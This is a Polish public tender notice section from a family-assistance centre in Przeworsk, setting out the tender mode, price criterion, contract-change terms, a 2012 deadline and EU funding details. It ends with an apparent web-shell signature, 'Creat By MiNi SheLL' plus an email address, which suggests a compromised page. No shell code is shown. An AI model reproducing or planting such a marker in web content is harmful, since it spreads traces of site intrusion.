<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ilość osób - uczestników turnusu może ulec zmniejszeniu. Zmniejszenie ilości uczestników turnusu nie rodzi zobowiązań po stronie zamawiającego. W sytuacji zmniejszenia ilości uczestników turnusu zamawiający nie ponosi kosztów za niewykorzystane na turnusie miejsca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.przeworsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Przeworsku
Reprezentowane przez Dyrektora, 
ul. Krakowska 11, 37-200 Przeworsk 
tel. (0-16) 649 09 10  fax (0-16) 649 09 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2012 godzina 14:30, miejsce: Powiatowe Centrum Pomocy Rodzinie w Przeworsku
ul. Krakowska 11, 37-200 Przeworsk 
tel. (0-16) 649 09 10  fax (0-16) 649 09 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienia w ramach projektu pn. Program aktywizacji społecznej w Powiecie Przeworskim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Przeworsku w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. Projekt współfinansowany ze środków UE  w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com